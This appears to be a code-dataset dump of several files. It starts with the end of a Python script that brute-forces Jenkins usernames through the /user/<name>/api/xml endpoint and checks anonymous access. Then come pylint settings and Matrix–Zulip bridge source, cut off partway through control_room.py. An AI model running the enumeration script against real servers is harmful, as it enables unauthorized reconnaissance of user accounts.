print ("[-] Can Anonymous view the local user list? NO !")
s = requests.get(WEBSITE + "/securityRealm/", proxies=PROXIES)
if s.status_code == 200:
print ("[+] Can Anonymous view Jenkins own user database? YES !")
print (f" [>] {WEBSITE}/securityRealm/")
elif s.status_code == 403:
print ("[-] Can Anonymous view Jenkins own user database? NO !")
elif s.status_code == 404:
print ("[-] Can Anonymous view Jenkins own user database? NO !")
print (" [X] Local authentication disabled")
print("[>] Initializing usernames bruteforcing ", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
except Exception:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
start_time = time.time()
requests_count = 0
for index, user in enumerate(WORDLIST, start=1):
try:
time.sleep(REQ_TIME)
user_url = WEBSITE + "/user/" + user + "/api/xml"
t = requests.get(user_url, proxies=PROXIES)
requests_count += 1
if t.status_code == 200:
print (f"[+] Valid username found at index {index} : {user}")
print (f" [>] {user_url}")
percentage = round((index*100) / len(WORDLIST),2)
#Prints a progress update each time another 10000 usernames have been checked
if index % 10000 == 0:
elapsed_time = time.time() - start_time
rps = requests_count / elapsed_time
print (f"[>] Checking {index}/{len(WORDLIST)} ({percentage}%) of total users... | RPS: {rps:.2f}")
if index == len(WORDLIST):
print ("[+] Bruteforcing complete! All usernames in wordlist were checked...")
except KeyboardInterrupt:
print (f"[X] Bruteforcing exited by user! {index} usernames in wordlist were checked...")
exit()
except Exception:
print ("[X] Error: Something went wrong. Check with --local_proxy and --req_interval 5")
exit()
if __name__ == "__main__":
main() | 5,059 | Python | .py | 98 | 47.27551 | 164 | 0.674305 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,574 | .pylintrc | GearKite_MatrixZulipBridge/.pylintrc | [MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=argparse
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=10
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=CVS
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked
# (useful for modules/projects where namespaces are manipulated during runtime
# and thus existing member attributes cannot be deduced by static analysis). It
# supports qualified module names, as well as Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.11
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
#variable-rgx=
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=132
# Maximum number of lines in a module.
max-module-lines=1000
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=old
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=raw-checker-failed,
bad-inline-option,
locally-disabled,
file-ignored,
suppressed-message,
useless-suppression,
deprecated-pragma,
use-symbolic-message-instead,
logging-fstring-interpolation,
unexpected-keyword-arg
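# Individual occurrences can also be exempted inline in source instead, e.g.:
#   some_call(**kwargs)  # pylint: disable=unexpected-keyword-arg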
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
enable=c-extension-no-member
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
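# Example (commented out so the pylint default stays in effect; the placeholders
# are standard pylint template fields):
#msg-template={path}:{line}:{column}: {msg_id}: {msg} ({symbol})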
# Set the output format. Available formats are text, parseable, colorized, json
# and msvs (visual studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work..
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io
| 21,277 | Python | .py | 458 | 44.181223 | 166 | 0.788316 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,575 | test_import.py | GearKite_MatrixZulipBridge/tests/test_import.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
# pylint: skip-file
import matrixzulipbridge.appservice
import matrixzulipbridge.command_parse
import matrixzulipbridge.control_room
import matrixzulipbridge.direct_room
import matrixzulipbridge.event_queue
import matrixzulipbridge.organization_room
import matrixzulipbridge.personal_room
import matrixzulipbridge.room
import matrixzulipbridge.space_room
import matrixzulipbridge.stream_room
import matrixzulipbridge.version
def test_dummy():
assert True
| 1,458 | Python | .py | 37 | 38.243243 | 95 | 0.821705 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,576 | space_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/space_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING
from mautrix.api import Method, Path
from mautrix.types import SpaceChildStateEventContent
from mautrix.types.event.type import EventType
from matrixzulipbridge.under_organization_room import UnderOrganizationRoom
if TYPE_CHECKING:
from mautrix.types import RoomID
from matrixzulipbridge.organization_room import OrganizationRoom
class SpaceRoom(UnderOrganizationRoom):
name: str
# pending rooms to attach during space creation
pending: list[str]
def init(self) -> None:
super().init()
self.name = None
self.pending = []
def is_valid(self) -> bool:
if not super().is_valid():
return False
# we are valid as long as our user is in the room
if not self.in_room(self.user_id):
return False
return True
@staticmethod
async def create(
organization: "OrganizationRoom", initial_rooms: list["RoomID"]
) -> "SpaceRoom":
logging.debug(
f"SpaceRoom.create(organization='{organization.id}' ({organization.name}))"
)
room = SpaceRoom(
None,
organization.user_id,
organization.serv,
[organization.user_id, organization.serv.user_id],
[],
)
room.name = organization.name
room.organization = organization # only used in create_finalize
room.organization_id = organization.id
room.pending += initial_rooms
return room
async def create_finalize(self) -> None:
resp = await self.az.intent.api.request(
Method.POST,
Path.v3.createRoom,
{
"creation_content": {
"type": "m.space",
},
"visibility": "private",
"name": self.organization.name,
"topic": f"Organization space for {self.organization.name}",
"invite": [self.organization.user_id],
"is_direct": False,
"initial_state": [
{
"type": "m.space.child",
"state_key": self.organization.id,
"content": {"via": [self.organization.serv.server_name]},
}
],
"power_level_content_override": {
"events_default": 50,
"users_default": 0,
"invite": 50,
"kick": 50,
"redact": 50,
"ban": 50,
"events": {
"m.room.name": 0,
"m.room.avatar": 0, # these work as long as rooms are private
},
"users": self.organization.permissions
| {self.organization.serv.user_id: 100},
},
},
)
self.id = resp["room_id"]
self.serv.register_room(self)
await self.save()
# attach all pending rooms
rooms = self.pending
self.pending = []
for room_id in rooms:
await self.attach(room_id)
def cleanup(self) -> None:
try:
organization = self.serv._rooms[self.organization_id]
if organization.space == self:
organization.space = None
organization.space_id = None
asyncio.ensure_future(organization.save())
logging.debug(
f"Space {self.id} cleaned up from organization {organization.id}"
)
else:
logging.debug(
f"Space room cleaned up as a duplicate for organization {organization.id}, probably fine."
)
except KeyError:
logging.debug(
f"Space room cleaned up with missing organization {self.organization_id}, probably fine."
)
super().cleanup()
async def attach(self, room_id: "RoomID") -> None:
# if we are attached between space request and creation just add to pending list
if self.id is None:
logging.debug(f"Queuing room {room_id} attachment to pending space.")
self.pending.append(room_id)
return
logging.debug(f"Attaching room {room_id} to space {self.id}.")
await self.az.intent.send_state_event(
self.id,
EventType.SPACE_CHILD, # pylint: disable=no-member
state_key=room_id,
content=SpaceChildStateEventContent(via=[self.serv.server_name]),
)
async def detach(self, room_id: "RoomID") -> None:
if self.id is not None:
logging.debug(f"Detaching room {room_id} from space {self.id}.")
await self.az.intent.send_state_event(
self.id,
EventType.SPACE_CHILD, # pylint: disable=no-member
state_key=room_id,
content=SpaceChildStateEventContent(),
)
elif room_id in self.pending:
logging.debug(f"Removing {room_id} from space {self.id} pending queue.")
self.pending.remove(room_id)
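# Sending m.space.child with empty content is how a child is removed from a
# Matrix space; the (now empty) state event itself remains in room state.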
async def post_init(self) -> None:
try:
organization = self.serv._rooms[self.organization_id]
if organization.space is not None:
logging.warning(
f"Network room {organization.id} already has space {organization.space.id} but I'm {self.id}, we are dangling."
)
return
organization.space = self
logging.debug(f"Space {self.id} attached to organization {organization.id}")
except KeyError:
logging.debug(
f"Network room {self.organization_id} was not found for space {self.id}, we are dangling."
)
self.organization_id = None
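# Typical flow (hedged sketch; "org" stands for an OrganizationRoom obtained elsewhere):
#   space = await SpaceRoom.create(org, [room_id_a, room_id_b])
#   await space.create_finalize()  # creates the m.space room and attaches the pending children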
| 6,970 | Python | .py | 170 | 29.958824 | 131 | 0.586741 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,577 | control_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/control_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import re
from argparse import Namespace
from html import escape
from typing import TYPE_CHECKING
from urllib.parse import urlparse
from mautrix.errors import MatrixRequestError
from matrixzulipbridge import __version__
from matrixzulipbridge.command_parse import (
CommandManager,
CommandParser,
CommandParserError,
)
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.personal_room import PersonalRoom
from matrixzulipbridge.room import Room
if TYPE_CHECKING:
from mautrix.types import MessageEvent
class ControlRoom(Room):
commands: CommandManager
def init(self):
self.commands = CommandManager()
cmd = CommandParser(
prog="PERSONALROOM",
description="create a personal room for an organization",
)
cmd.add_argument("organization", nargs="?", help="organization name")
self.commands.register(cmd, self.cmd_personalroom)
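# The admin-only commands below all follow the same pattern as PERSONALROOM:
# build a CommandParser, then register it together with its cmd_* handler.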
if self.serv.is_admin(self.user_id):
cmd = CommandParser(
prog="ORGANIZATIONS", description="list available Zulip organizations"
)
self.commands.register(cmd, self.cmd_organizations)
cmd = CommandParser(
prog="OPEN", description="open organization for connecting"
)
cmd.add_argument("name", help="organization name (see ORGANIZATIONS)")
cmd.add_argument(
"--new",
action="store_true",
help="force open a new organization connection",
)
self.commands.register(cmd, self.cmd_open)
cmd = CommandParser(
prog="STATUS",
description="show bridge status",
epilog="Note: admins see all users but only their own rooms",
)
self.commands.register(cmd, self.cmd_status)
cmd = CommandParser(
prog="QUIT",
description="disconnect from all organizations",
epilog=(
"For quickly leaving all organizations and removing configurations in a single command.\n"
"\n"
"Additionally this will close current DM session with the bridge.\n"
),
)
self.commands.register(cmd, self.cmd_quit)
cmd = CommandParser(prog="MASKS", description="list allow masks")
self.commands.register(cmd, self.cmd_masks)
cmd = CommandParser(
prog="ADDMASK",
description="add new allow mask",
epilog=(
"For anyone else than the owner to use this bridge they need to be allowed to talk with the bridge bot.\n"
"This is accomplished by adding an allow mask that determines their permission level when using the bridge.\n"
"\n"
"Only admins can manage organizations, normal users can just connect.\n"
),
)
cmd.add_argument(
"mask", help="Matrix ID mask (eg: @friend:contoso.com or *:contoso.com)"
)
cmd.add_argument("--admin", help="Admin level access", action="store_true")
self.commands.register(cmd, self.cmd_addmask)
cmd = CommandParser(
prog="DELMASK",
description="delete allow mask",
epilog=(
"Note: Removing a mask only prevents starting a new DM with the bridge bot. Use FORGET for ending existing"
" sessions."
),
)
cmd.add_argument(
"mask", help="Matrix ID mask (eg: @friend:contoso.com or *:contoso.com)"
)
self.commands.register(cmd, self.cmd_delmask)
cmd = CommandParser(
prog="ADDORGANIZATION", description="add a Zulip organization"
)
cmd.add_argument("name", help="server address")
self.commands.register(cmd, self.cmd_addorganization)
cmd = CommandParser(
prog="DELORGANIZATION", description="delete a Zulip organization"
)
cmd.add_argument("name", help="organization name")
self.commands.register(cmd, self.cmd_delorganization)
cmd = CommandParser(prog="FORGET", description="Forget a Matrix user")
cmd.add_argument("user", help="Matrix ID (eg: @ex-friend:contoso.com)")
self.commands.register(cmd, self.cmd_forget)
cmd = CommandParser(
prog="DISPLAYNAME", description="change bridge displayname"
)
cmd.add_argument("displayname", help="new bridge displayname")
self.commands.register(cmd, self.cmd_displayname)
cmd = CommandParser(prog="AVATAR", description="change bridge avatar")
cmd.add_argument("url", help="new avatar URL (mxc:// format)")
self.commands.register(cmd, self.cmd_avatar)
cmd = CommandParser(
prog="MEDIAURL", description="configure media URL for links"
)
cmd.add_argument("url", nargs="?", help="new URL override")
cmd.add_argument(
"--remove",
help="remove URL override (will retry auto-detection)",
action="store_true",
)
self.commands.register(cmd, self.cmd_media_url)
cmd = CommandParser(
prog="MEDIAPATH", description="configure media path for links"
)
cmd.add_argument("path", nargs="?", help="new path override")
cmd.add_argument(
"--remove", help="remove path override", action="store_true"
)
self.commands.register(cmd, self.cmd_media_path)
cmd = CommandParser(prog="VERSION", description="show bridge version")
self.commands.register(cmd, self.cmd_version)
self.mx_register("m.room.message", self.on_mx_message)
def is_valid(self) -> bool:
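        # a control room is valid only as a 1:1 DM: the user and the bridge bot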
if self.user_id is None:
return False
if len(self.members) != 2:
return False
return True
async def show_help(self):
self.send_notice_html(
f"<b>Howdy, stranger!</b> You have been granted access to the Zulip bridge of <b>{self.serv.server_name}</b>."
)
try:
return await self.commands.trigger("HELP")
except CommandParserError as e:
return self.send_notice(str(e))
async def on_mx_message(self, event: "MessageEvent") -> bool:
if str(event.content.msgtype) != "m.text" or event.sender == self.serv.user_id:
return
# ignore edits
if event.content.get_edit():
return
try:
lines = event.content.body.split("\n")
command = lines.pop(0)
tail = "\n".join(lines) if len(lines) > 0 else None
await self.commands.trigger(command, tail)
except CommandParserError as e:
self.send_notice(str(e))
def organizations(self):
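        # index configured organizations by lowercased name for case-insensitive lookup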
organizations = {}
for organization, config in self.serv.config["organizations"].items():
config["name"] = organization
organizations[organization.lower()] = config
return organizations
async def cmd_masks(self, args):
msg = "Configured masks:\n"
for mask, value in self.serv.config["allow"].items():
msg += "\t{} -> {}\n".format(mask, value)
self.send_notice(msg)
async def cmd_addmask(self, args):
masks = self.serv.config["allow"]
if args.mask in masks:
return self.send_notice("Mask already exists")
masks[args.mask] = "admin" if args.admin else "user"
await self.serv.save()
self.send_notice("Mask added.")
async def cmd_delmask(self, args):
masks = self.serv.config["allow"]
if args.mask not in masks:
return self.send_notice("Mask does not exist")
del masks[args.mask]
await self.serv.save()
self.send_notice("Mask removed.")
async def cmd_organizations(self, args):
organizations: dict["OrganizationRoom", dict] = self.serv.config[
"organizations"
]
self.send_notice("Configured organizations:")
for _, data in organizations.items():
self.send_notice(f"\t{data}")
async def cmd_addorganization(self, args):
organizations = self.organizations()
if args.name.lower() in organizations:
return self.send_notice("Organization with that name already exists")
self.serv.config["organizations"][args.name] = {
"name": args.name,
}
await self.serv.save()
self.send_notice("Organization added.")
async def cmd_delorganization(self, args):
organizations = self.organizations()
if args.name.lower() not in organizations:
return self.send_notice("Organization does not exist")
del self.serv.config["organizations"][args.name.lower()]
await self.serv.save()
return self.send_notice("Organization removed.")
async def cmd_status(self, _args):
users = set()
response = ""
if self.serv.is_admin(self.user_id):
for room in self.serv.find_rooms():
